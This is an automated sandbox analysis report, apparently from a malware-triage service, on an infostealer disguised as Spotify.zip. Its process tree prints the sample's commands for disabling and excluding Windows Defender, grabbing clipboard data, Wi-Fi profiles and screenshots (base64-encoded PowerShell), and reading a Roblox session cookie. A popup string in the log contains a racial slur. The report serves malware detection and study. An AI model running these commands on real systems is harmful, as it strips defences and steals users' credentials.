Analysis

  • max time kernel
    149s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-12-2024 21:36

General

  • Target

    Spotify.zip

  • Size

    6.8MB

  • MD5

    e379c12a1b24836cca20d27ff690d4f1

  • SHA1

    5630a21e177f4d41bfcc62ab3b55cac6ff6998ac

  • SHA256

    2f3272c5f72ab7029e8174c2285da91c71fa24a64f5201dd9a5d68f93378334a

  • SHA512

    88adeeff664312efe8c6af71e155018fa7da3729189909c9a48f1a284f50702535973df8c96a95ebdc752c658ab8403276317b1bec6ab44807b7d1337ba6678d

  • SSDEEP

    98304:fImhhW42rEgcmQr7qAsm+H93VeyipZ2PWaP3IVhZ6McTIcr4DaXcLvVO1+OFJcMe:nA6vqbeVZmDP3IRcMzLo1+GLlqfNAUb

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 60 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Spotify.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Users\Admin\AppData\Local\Temp\7zO839287C7\Spotify.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO839287C7\Spotify.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1100
      • C:\Users\Admin\AppData\Local\Temp\7zO839287C7\Spotify.exe
        "C:\Users\Admin\AppData\Local\Temp\7zO839287C7\Spotify.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4036
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO839287C7\Spotify.exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4960
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO839287C7\Spotify.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1548
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3260
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:392
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Get ratted nigger', 0, 'Get ratted', 48+16);close()""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2272
          • C:\Windows\system32\mshta.exe
            mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Get ratted nigger', 0, 'Get ratted', 48+16);close()"
            5⤵
              PID:1584
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4492
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3984
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3672
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic csproduct get uuid
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2572
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2100
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              5⤵
                PID:4556
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1464
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                5⤵
                  PID:4904
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4472
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  5⤵
                  • Detects videocard installed
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4500
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4112
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  5⤵
                  • Detects videocard installed
                  PID:3924
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\7zO839287C7\Spotify.exe""
                4⤵
                • Hide Artifacts: Hidden Files and Directories
                • Suspicious use of WriteProcessMemory
                PID:5056
                • C:\Windows\system32\attrib.exe
                  attrib +h +s "C:\Users\Admin\AppData\Local\Temp\7zO839287C7\Spotify.exe"
                  5⤵
                  • Views/modifies file attributes
                  PID:652
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏    .scr'"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3228
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏    .scr'
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3452
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2192
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  5⤵
                  • Enumerates processes with tasklist
                  PID:4228
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2020
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  5⤵
                  • Enumerates processes with tasklist
                  PID:2872
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                4⤵
                  PID:1780
                  • C:\Windows\System32\Wbem\WMIC.exe
                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    5⤵
                      PID:4516
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                    4⤵
                    • Clipboard Data
                    PID:2868
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Get-Clipboard
                      5⤵
                      • Clipboard Data
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2212
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    4⤵
                      PID:2296
                      • C:\Windows\system32\tasklist.exe
                        tasklist /FO LIST
                        5⤵
                        • Enumerates processes with tasklist
                        PID:1704
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      4⤵
                        PID:3880
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          5⤵
                            PID:1708
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                          4⤵
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:4668
                          • C:\Windows\system32\netsh.exe
                            netsh wlan show profile
                            5⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Network Configuration Discovery: Wi-Fi Discovery
                            PID:4612
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "systeminfo"
                          4⤵
                            PID:4624
                            • C:\Windows\system32\systeminfo.exe
                              systeminfo
                              5⤵
                              • Gathers system information
                              PID:2496
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                            4⤵
                              PID:2784
                              • C:\Windows\system32\reg.exe
                                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                5⤵
                                  PID:3124
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                4⤵
                                  PID:5084
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                    5⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3480
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xybduclw\xybduclw.cmdline"
                                      6⤵
                                        PID:4488
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF618.tmp" "c:\Users\Admin\AppData\Local\Temp\xybduclw\CSCFC3E1BF4956D4F4A927DA3492FFF326E.TMP"
                                          7⤵
                                            PID:3124
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      4⤵
                                        PID:2156
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          5⤵
                                            PID:400
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                          4⤵
                                            PID:3200
                                            • C:\Windows\system32\attrib.exe
                                              attrib -r C:\Windows\System32\drivers\etc\hosts
                                              5⤵
                                              • Drops file in Drivers directory
                                              • Views/modifies file attributes
                                              PID:3880
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            4⤵
                                              PID:1932
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                5⤵
                                                  PID:4500
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  5⤵
                                                    PID:2948
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                  4⤵
                                                    PID:4208
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +r C:\Windows\System32\drivers\etc\hosts
                                                      5⤵
                                                      • Drops file in Drivers directory
                                                      • Views/modifies file attributes
                                                      PID:2812
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    4⤵
                                                      PID:2784
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        5⤵
                                                          PID:4440
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                        4⤵
                                                          PID:2648
                                                          • C:\Windows\system32\tasklist.exe
                                                            tasklist /FO LIST
                                                            5⤵
                                                            • Enumerates processes with tasklist
                                                            PID:4068
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          4⤵
                                                            PID:3200
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              5⤵
                                                                PID:1360
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                              4⤵
                                                                PID:2436
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  5⤵
                                                                    PID:1780
                                                                  • C:\Windows\system32\tree.com
                                                                    tree /A /F
                                                                    5⤵
                                                                      PID:4024
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    4⤵
                                                                      PID:1708
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
